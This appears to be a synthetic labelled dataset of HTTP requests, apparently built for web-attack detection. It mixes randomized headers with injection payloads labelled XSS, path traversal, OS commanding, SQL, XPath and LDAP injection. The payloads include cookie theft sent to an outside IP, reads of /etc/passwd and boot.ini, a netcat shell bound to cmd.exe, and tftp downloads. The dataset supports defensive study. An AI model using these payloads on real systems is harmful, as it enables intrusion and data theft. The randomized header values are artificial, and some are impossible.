Via: iybuYu/5.3 230.157.209.125, HTTP/6.8 233.182.219.105
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 0.114.107.58
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37061
Start - Id: 47099
class: XSS
GET /r2Zi6_0VIxi/bpPIYHJXx74Me/lHdhedsxoenxb/anujt8iuyC/enhr5irukaMod/p./tioeaO4nwsvz/uailen/3begm/sKsC0j4o/5n/eeireseLauwjrmYh.pl?6h8=%3C%21--+--+--%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F210.150.40.61%2Frianat.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E%3C%21--+--+--%3E&tiryeinlmeorrou=4&sitnNx=tiefOe+e%2Fhmerm%2Bm&eMataj=735293&h0or7ro3Iqlome=IaaalqopenDna&giEuiirnnNN=53880830 HTTP/1.0
Host: www.egnhAjenyv.fr
Connection: close
Accept: image/gif;q=0.4, text/*;q=0.8
Accept-Charset: x-mac-roman;q=0.2, utf-7, iso-2022-kr, hz-gb-2312;q=0.7, ks_c_5601-1987;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: ikMhpe=oNlwwa~akz;sititd2=lkmuFU3g
Cookie2: $Version="1"
Date: Tue, 02 May 06 14:13:35 UTC
ETag: "XOMJ0beCZEOjKw_8d"
Expect: 100-continue
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sun, 29 Mar 09 03:20:24 UTC
If-Unmodified-Since: Sat, 06 Oct 07 07:07:00 UTC
If-Match: *
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: Sat, 02 Jun 07 19:13:50 CET
Max-Forwards: 5727
MIME-Version: 2.8
Pragma: je='ziqk5n'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: /treth/yevo.php3
TE: chunked;q=0.2,trailers
Trailer: If-None-Match
User-Agent: ogeIe (pH9df.wr; fS_rs49; us1BZMVsLs; eLtDO04; sORg7koRSJ)
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 320x898
Via: FTP/9.8 www.prtgL19.css, 2.8 www.oebwa0.html
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47099
Start - Id: 36201
class: PathTransversal
PUT /31FlRc/imNikL/tSmn1rwRrszn9itlooz3/dyhtiaopvhe5Ottclei/jfhdte/nFGdocumentc/ePt2fh8mVBLvuehB/iufbetvnij/5Nu8TpDPPUx63jPsE/uuoalnyek3qtypignhc/e.gRrzQ/r7jXvALdop6XTUiIBb@5.gif? HTTP/1.1
Content-Length: 125
Content-Language: EI
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 30 Apr 06 06:36:49 GMT
Host: www.eanl5n.cz:80
Connection: close
Accept: image/gif, audio/*;q=0.1
Accept-Language: *
Cookie: wm3aesHkeeeCea=3tS;iML0ITINwp-a=/../../../../Inetpub/iissamples/inenti/reranaon/ensiland/lironaiese.asmx;t5LE4sj=646053077
Cookie2: $Version="59"
ETag: "MxqOYJaDImWEHFW"
If-None-Match: "6IhdpV@sBq.k-tNws"
Max-Forwards: 546
Pragma: no-cache
Proxy-Authorization: Digest nc=ABddd8f8
Referer: http://www.l7anetqa.org/mlDl26ho/heexskh0/egaoko/eTas6q.nsf
User-Agent: Mozilla/9.6 (Windows; U; WinNT 9.0; cz-ss; rv:0.7.5) Gecko/74769653
UA-Color: color32

attzt3rWDosm=3521873&cah=hiwga bb&e0at0IOe3vizwss=rl0mnnrdne8&eru7dsgjimhe7a0=eui4rqnadbgsln&ftovnaombra=yostetaiiynt]g]t

End - Id: 36201
Start - Id: 45967
class: PathTransversal
GET /ooteeu7rfliec0rrh/tdnttcnmoalaS/sND_JfM.cnCIfeX/JUZ95RoptYtUAhttpY.exe?cquMUon7cCdeletem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.nrahEn.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-15, euc-cn, x-mac-roman;q=0.8, windows-1257
Accept-Encoding: gzip;q=0.5, gzip;q=0.7, identity
Accept-Language: *
Cache-Control: min-fresh=49
Client-ip: 84.6.25.215
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="43"
Date: Mon, 08 Mar 10 16:24:10 CET
ETag: W/"Tw.50e1c0c9D2NOl@2Y"
Expect: 100-continue
From: giwa@ncetc3ams.net
If-Modified-Since: Wed, 25 Jul 07 04:20:12 GMT
If-Unmodified-Since: Tue, 19 Jul 05 04:56:31 GMT
If-Match: *
If-None-Match: "bbG7hxtVk431Ecdf."
If-Range: Mon, 12 Apr 10 20:06:17 CET
Max-Forwards: 8024
Pragma: no-cache
Proxy-Authorization: lnD9oe saOi=waea
Authorization: egeteo TokaeEce=c8yd
Referer: http://llhaeid.com/nGrneie/xfza/esire.gz
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 2.3; mi-il; rv:6.5.3) Gecko/18729478
UA-CPU: x86
UA-OS: Win98
UA-Color: color16
UA-Pixels: 297x264
Via: 1.8 www.emuerwfo.tiff:788, FTP/1.0 170.207.50.151
Transfer-Encoding: gzip
Upgrade: gOraok/6.8, woRu/7.2, saOiE/3.6, nltr/3.7
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45967
Start - Id: 43659
class: OsCommanding
POST /qpitiv2nksVti/ayuoaass7bi/89Moynrl1aesokm/FaDXH@L3qQzCQrB/eQvB/P1CusrzEmTXerjVCW/eeh7XBNKRlSobw/ia/sdLbZl5QxeF24_/9Xlo/omxF.html? HTTP/1.0
Content-Length: 272
Content-Language: dcavhdYL
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 14:21:52 UTC
Host: www.eesro.com
Connection: close
Accept: audio/basic;q=0.0, audio/x-wav, application/zip;q=0.6
Accept-Charset: *
Accept-Language: *
Cookie: ron=\"    \;    \/usr\/bin\/telnet     www.asel.com 9822 ;;oYreplacedgSNXmexecl=evXI;VlMGC=E0e&t;vTaa=agwQjJar
Date: Fri, 13 Jun 08 12:34:51 GMT
If-Range: Wed, 23 Dec 09 09:50:30 CET
Referer: /ie9bn/iodnloEO/SoM0/rebb/nenurtmu.wav
User-Agent: oCtA_l3 http://www.atot.be
UA-Disp: 232,8736,32
~~~~~: ~~~~~~~~~~~~~~~~~~~~

l9lEeh8riN2tn1r=ftanb&jrownrrlhikujs=lz&aeibica9sdok=eW@6  htpassbacnph-/tpp&htaccesEVk-u7Wj=olsscript<&ueaaz5=sposyday&xuKwNi_HIUu=><&X1JK_YVnxL=roUl@evalEa&Y0LfR=45985&8Xnm4lih5=thZYW@Oi&a9tsEaotna2gt0=ezot&unse=r.vywbaTpR&rsrnbTxe=9<kls:ity&twst7hp=at

End - Id: 43659
Start - Id: 36841
class: OsCommanding
PUT /aOpzfG6bz7A.x_W/sdeiiEw8E6linia.shtml? HTTP/1.0
Content-Length: 68
Content-Language: d1177,9aaYd
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: 77.143.3.187
Connection: rdYlrsU
Accept: */*
Accept-Charset: windows-1257, iso-8859-9, x-mac-turkish;q=0.8
Accept-Encoding: *;q=0.8
Cache-Control: max-age=9524
Client-ip: 197.167.5.52
Date: Sat, 13 Mar 10 01:13:35 GMT
ETag: ".0p9pDT4KsTimXMZ"
If-Unmodified-Since: Fri, 23 Nov 07 07:15:39 UTC
If-Match: "rFJlBP7c4ei.oUv"
If-None-Match: "csY9bPDsdw5_@CVmmBXT"
Max-Forwards: 167
Referer: http://ty9uo.cz/nndtwnee/ntpfg/rd6t/eiIf.php4
TE: chunked,trailers,trailers
User-Agent: cat  /etc/passwd |
Via: FTP/0.5 150.161.156.134

nin=3&heerutlnsetlt=rq13ipIZ5&ioln=sfy&3simsiiyci=66?eta9tzoorrcp 

End - Id: 36841
Start - Id: 49855
class: XPathInjection
GET /1enssttnl/rCeFnullGl5O0dl/a6WQeWQ3qXQAHM1v/z5Di8Z9v.css?lltl=829&irkoide=ewn%5D&a5Y7lufe7eeel=Og&yyZCRxtermvx=ceuhhre4&reberm3s=2&sotd6Tqe7esol=e5s3yG%27++or++a%2Fdu3tf%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D12%5D+++or++%27ezcn%27++++%3D++%27&4jeUlsnqle=eul%7Eed&rrifesh46stLR=nq&DH8.xhyNpJ=e4oya HTTP/1.0
Host: 13.32.152.43
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: sSe-edh3e;q=0.5, lqo-unirafuh;q=0.9, l-ulan, EiScc-tout;q=0.0, To-ejdsth;q=0.8
Cache-Control: min-fresh=2601
Client-ip: 90.191.214.185
Cookie: 2Y.QBTuf8=r ;akllNeLxsehl=sc ersstdinaidH
Cookie2: $Version="51"
Date: Wed, 21 Nov 07 17:14:02 GMT
ETag: W/"HtKEFG2QVS@P1.4FS"
Expect: 100-continue
From: oyrua@eNee.com
If-Modified-Since: Sun, 22 Nov 09 05:11:28 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "vn5tcbwjNsHEkPu_de"
If-None-Match: *
If-Range: Sun, 02 Dec 07 09:38:54 GMT
Max-Forwards: 390
MIME-Version: 4.1
Pragma: ijl7t=uo
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: xlE0 aelJ=NEonemxl
Range: 451065-8,-1181,-282
Referer: /sthtsttc.mdb
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/3.9 (Windows; U; WinNT 8.9; mh-ui; rv:5.7.3) Gecko/54132802
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 967x245
Via: 9.1 62.8.231.97
Transfer-Encoding: rfj8f9
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49855
Start - Id: 42278
class: SqlInjection
GET /7i2eNZO_Ihome/knRalvcscript6hXQPA/rtiwt3n/nqknBzhwgM7jG8uYQl1Q/coie4asen0a3oa7c4v.mdb?treenftvvde=1&ihplhrssD8R=%3B++++exec++++get_cust%28++++%27x%27%27+++union+select+++++object_name%2Cobject_type%2C%27%27x%27%27+++from++user_objects+++++where++++%27%27so9%27%27+%3D++%27%27++%27++++%29%3B&ltpsnTjohnqnil=114903&IuurZscript0gK=77&eMeD7h=3&etokl0wje=73&JNpDN=2458 HTTP/1.0
Host: www.Aiij.it
Connection: close
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="649"
Date: Sat, 07 Aug 04 21:53:42 CET
ETag: "rhy9oCBT7nmj@i1"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "TCjUqLG2W-yNXEXIO0B"
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 17-374188
Referer: /tEet/7oCoasrb/roarq2t/ifOiv/sydy.ace
TE: gzip,gzip;q=0.2,trailers
Trailer: Date
User-Agent: Mozilla/0.2 (X11; U; SunOS sun4u 7.9; be-qi; rv:7.2.7) Gecko/04521783
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0775x379
Via: 2.3 www.1ssIr.js, eo7O/8.5 142.95.240.148:17, 9.8 57.157.89.26
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 221.156.21.94
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42278
Start - Id: 42812
class: OsCommanding
POST /eNpDaos/dinaged/yqaq5V8EP/ovsh0ay3ujaceaeax/sC0j1Jda/ohmegch6fj.jpg? HTTP/1.1
Content-Length: 180
Content-Language: odfiN3,de0Ari8s
Content-Encoding: identity
Content-Location: http://www.ktAGtets.org/itevwR/rtaias/enotlnf/cmho/acxe.mp3
Content-MD5: ZERoYUVjbUhpN2RVZWltMg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Jun 05 18:33:14 GMT
Last-Modified: Tue, 21 Sep 04 11:56:13 CET
Host: www.ies7itw.uk
Connection: xdsstn
Accept: */*
Accept-Charset: windows-874;q=0.7, iso-8859-15;q=0.9, iso-8859-8;q=0.1, us-ascii, windows-1251
Accept-Language: *
Cache-Control: only-if-cached
Date: Fri, 03 Nov 06 14:51:34 GMT
If-None-Match: *
Max-Forwards: 9675
Referer: http://www.faoenonb.de/enebnilq/e0asv/qianer/ln5er.gif
User-Agent: n6nt/3.7.5
UA-Pixels: 0367x479
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

yoiorwmj=eoc&oMn3osio7m=rLisdyrt&wrmM4=nijstdiHa&repe=|    shell(    "cmd /c c:InetpubwwwrootMSISSnc.exe   -l -p   8338    -t    -e cmd.exe     "  )|'&SOl2a=94707

End - Id: 42812
Start - Id: 38939
class: LdapInjection
GET /vssaisektioSTyB/htiahH.css?eeaxehvkabh=9308792869&a7e=0729&saREivnkrh=hdAdio&oottystels=M-u&piqddede=g+&6bheita=983&tsrg=8st%29%28++%7C++++%28at%3D*%29 HTTP/1.0
Host: www.dohc.fr:80
Connection: rrquHuah
Accept: */*
Accept-Charset: koi8
Accept-Encoding: deflate;q=0.5, identity, identity;q=0.4, compress
Accept-Language: rht-n4;q=0.5, bpEtt-rlj3htw, ezr-iticevuh;q=0.0
Cache-Control: max-age=5580
Client-ip: 53.164.177.129
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="7"
Date: Sun, 21 Dec 08 21:35:00 UTC
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: LdFns
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 16 Jun 08 20:20:33 CET
If-Unmodified-Since: Mon, 29 May 06 03:43:52 CET
If-Match: "_e84BLlSNEdGvmCB"
If-None-Match: *
If-Range: *
Max-Forwards: 994
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM YWRXdWhib2V5YXRlc0FwZWllcDZvc0oybnRuQWFBNHJybg==
Range: 19115-,-68,486-99
Referer: http://www.gY3oiUoa.biz/ile6e/oseI6hoa/twmght/oaooarl.jpeg
TE: chunked;q=0.4,trailers
Trailer: From
User-Agent: Mozilla/9.1 (X11; U; Linux i586 1.5; os-an; rv:3.9.4) Gecko/83409661
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38939
Start - Id: 38364
class: LdapInjection
GET /t8r78BbTQIGX6BF/3ndmalet/9pnraQSdcjvcd/toi_m8_K3Mq8ElGsIXmD/nomet4h8onM0vih4ao/3pder/vbnrmbs3uratk/rDo6mznKCloQQGJDXJ/sx5Inose/adza165nBT6rlUgP2/e1rxUezrezwuXJvMO/eh9ngdvsnsoonehaee.php4?ateiet6alo1=3hmocha8&aevdh4xriort=++p&eiCm1=4083&EbMsnefsse=homeie&ueA=26422&hlA894ou=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&srPtar3DCct5a8i=Uuexecetaf+&spvwyjcl6ipue=tohuauuec1o6Iut&stlrP=go2wt&8dxrerc=2485780&asel=842691 HTTP/1.1
Host: 68.31.11.20:5981
Connection: close
Accept: video/mpeg, image/jpeg
Accept-Charset: hz-gb-2312;q=0.0, x-mac-japanese;q=0.4, x-mac-turkish;q=0.8, windows-1254;q=0.5, cp-932;q=0.5
Accept-Encoding: identity;q=0.2, identity, compress;q=0.9, gzip;q=0.0, gzip;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 193.201.183.61
Cookie: CTRexecpasswdCHg=hoie;WMNUZE83TPM=iyohmITrnhsfuk
Cookie2: $Version="3"
Date: Mon, 08 Feb 10 05:36:55 GMT
ETag: W/"ZyekoH8b5pnAccaIUM@"
Expect: 100-continue
From: ri1uNdit@reossclvd.be
If-Modified-Since: Fri, 27 Feb 04 02:01:10 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 771
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: NTLM M3RJYTYzcmlhc282dGVpMmVlaXUxY2NkaExkd25uUmVoM2NudGtnb3I=
Range: 84-89,256260-35,5-
Referer: http://iHnrGnn.ch/6yys/dlsu/blset.jsp
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (X11; U; Linux i386 1.5; i5-to; rv:2.0.1) Gecko/28571957
UA-CPU: 68000
UA-Disp: 6003,793,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 8.2 www.nxQa2r.js
Transfer-Encoding: identity
Upgrade: ooh/1.6, rCeq/8.8
Warning: 242 www.rnh0htla.jpg:8 "nyednaRaaanaige" "Wed, 12 Mar 08 13:13:41 GMT"
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38364
Start - Id: 48771
class: XPathInjection
GET /6eTIixtt/lPwG7/tooe53eer9/wtmttiHii5dta/pOLG@.C9ed.aspx?nta9tta1dn=435&prlesE=tFYixzKT&etef=df++nad&waui4hlahr=6&ltqfagax=3++or+++irmni%2Fy3oo%2Fcn2oE%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D676%5D++++or+++++485%3D&eehcrk=oheI93+&habtr=104439&hof=4&ealaCttthue=04507568&em2nRo7=3714 HTTP/1.1
Host: 236.172.101.228:75
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.1, audio/*
Accept-Charset: iso-8859-7;q=0.2, iso-2022-kr;q=0.5, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 127.213.245.188
Cookie: toCe1tO=5141;neivmdonp7hncr=936;nedtddamitkZyoP=r;cntnegnkecer=478918;nsA=2 apd
Cookie2: $Version="80"
Date: Sat, 06 Mar 04 12:36:41 UTC
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Tue, 01 Feb 05 02:03:34 GMT
If-Unmodified-Since: Sat, 29 Jul 06 16:34:01 CET
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: "noFgYCg9kETWvj7V@"
Max-Forwards: 4
MIME-Version: 1.8
Pragma: a7raot='8nrwBMl'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: oe4a Hu5ooei=entdde
Range: -333764,-7
Referer: http://kt5sii.biz/p7yt7/Cae7Eot/ew3Oudo.jpg
TE: trailers,trailers
Trailer: If-Match
User-Agent: rFHH-upge http://www.meeehzk6.it
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 526 136.169.175.214 "laeisnhoreecfefnrs" 
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48771
Start - Id: 45897
class: PathTransversal
GET /0htaccesQ@Gstylez/tLnph--pCCR-@/tNUYAKbYKO/rsgiIartdivdnm/nwtUtliptEubydkmhoIa/el/ar.php4?mnos5domeHoavt=c%3A%5Cwinnt%5Cboot.ini&d6HlaYii6fb=%2FjlserviceserkQotdn%26o HTTP/1.1
Host: www.atwrseo.org
Connection: emegusao
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 74.245.130.235
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="33"
Date: Fri, 24 Aug 07 14:17:48 CET
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: NkanyTe@uhoerre.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Mon, 08 Mar 10 07:13:44 UTC
If-Match: "DChR2DoxsG6crIf5jM"
If-None-Match: *
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: vfOyrte='alwkded'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: /r8eoVe/eaa8el.sh
TE: trailers
Trailer: TE
User-Agent: rlpit2l6grx40englt
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: tdf9t/4.0 214.255.180.225, 8.6 133.118.209.208
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45897
Start - Id: 35615
class: XPathInjection
GET /SIgdq/hxSgXjXqKEQLcA8/k5oosit4irhor6nl.aspx?p9t=88+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++6136%3D&aa1s4D=%27neet%24atrutuka&eihjhrtxor3e=eJ60 HTTP/1.0
Host: www.ntndbUtTo.de:27450
Connection: close
Accept: text/*
Accept-Charset: x-mac-hebrew, x-mac-greek;q=0.9, iso-8859-5;q=0.4, iso-8859-8
Accept-Encoding: gzip, identity, identity;q=0.8, identity;q=0.1, deflate;q=0.6
Accept-Language: d-tyA;q=0.3, epueehn-arpt
Cache-Control: max-stale=11
Client-ip: 101.51.218.73
Cookie: l1=tttjtdrqakbswt;HxTNRW9IMWo=swc
Cookie2: $Version="923"
Date: Tue, 03 Jul 07 09:45:11 UTC
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: orei@biOfnOuc.com
If-Modified-Since: Sat, 23 Aug 08 13:32:54 UTC
If-Unmodified-Since: Thu, 01 Mar 07 16:04:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3757
MIME-Version: 4.8
Pragma: 1=Uampieam
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: NTLM ZGJ3eXVleXR0RXRyb3RzbmluQWh0bGpuZWx0Y3NyYWVwamV0YXNydG1l
Range: -827333,2893-
Referer: /rtlep/ait0tbi/ttlun2/tsuj.sh
TE: gzip,chunked,trailers
Trailer: Host
User-Agent: sef4lnqajnBmlepot
UA-CPU: PowerPC
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: ciiv/8.8 74.176.63.176, 0.3 101.128.38.105
Transfer-Encoding: fese
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35615
Start - Id: 38117
class: LdapInjection
GET /cK9kwFAXhn/xHqHnc/93Fwhere/otqn/teh6taLaeg/mtahveipqmoodtn/UqH8a8tbdrop/lA.tiff?voDS=ysetuebts9&eesrdstcO=323952&snoirok4rdadoyN=+iNuyr&3SQn3nnnJiH=on%26%25oeu99xbpreplaceskda&2rAihhenaaee2=%29%28+%7C++%28displayName%3Dhad*%29+++%28name+++%3D++had*++%29%28mail%3Dhad*++%29&mrSi9oh7=e&aihnoJkswioiov=Eouelozfoy6hushnsh&se6=iCu4Qm HTTP/1.1
Host: 115.209.136.178:0178
Connection: close
Accept: image/*
Accept-Charset: windows-874;q=0.1, us-ascii, x-mac-arabic, windows-874;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-stale=04513
Client-ip: 78.109.79.136
Cookie: htran9esDdfysg5=etin smtbetween;9Or6=yhejeae;eaetttt=&r]hftL;XPnodehwSwinntcJ=e1etmnAeblemocmuru
Cookie2: $Version="4"
Date: Sat, 27 Jan 07 02:57:21 CET
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "Y5KfYhUBUPdlLQ3w"
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:02:34 GMT
Max-Forwards: 346
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Basic dGVIRWU6ZWFyNGU=
Range: 448259-
Referer: http://www.lMhs.org/vlEs/hRcore/nwhtt/etabo.asmx
TE: chunked,chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 1.0; Ne-eS; rv:9.9.2) Gecko/93872699
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: 5.2 178.12.145.116, eeaMo/0.8 65.87.250.41, 2.4 www.ah8N0k.gif
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38117
Start - Id: 43340
class: OsCommanding
GET /uRZXH.q3DsZ9H@k1/qEo44Lr/mICS3zyza-si/nCxxnog/ta/tedV/oqoCodlAwIdv/l@_7iSrh2u6mmQAmzsc/aocctnll8gsN/4oiogs1neoMrr/gcrdoi97me5ashs/86rhnkvtzTmese.gif?tshrs=4&xtermCB8C=%27++%3B+++tftp+-c++++get++++www.nsnsiese.com%3A%2Fti.tar HTTP/1.0
Host: 33.57.80.85:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-roman;q=0.1
Accept-Encoding: identity;q=0.9
Accept-Language: e9e-oonnm;q=0.5, aoehi-ttantttk;q=0.3, do0ck-oeFidi;q=0.6, i-rd, u29cwwho-6aiennc3;q=0.3
Cache-Control: max-stale=4
Client-ip: 39.142.10.38
Cookie: E0aiefsC5txnf=032004;etew8u9E9t4ei=kVR4FBEI;sH=aTc;A5S7g=between/uchildjR;vhf=5231
Cookie2: $Version="76"
Date: Wed, 03 Mar 10 24:25:32 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
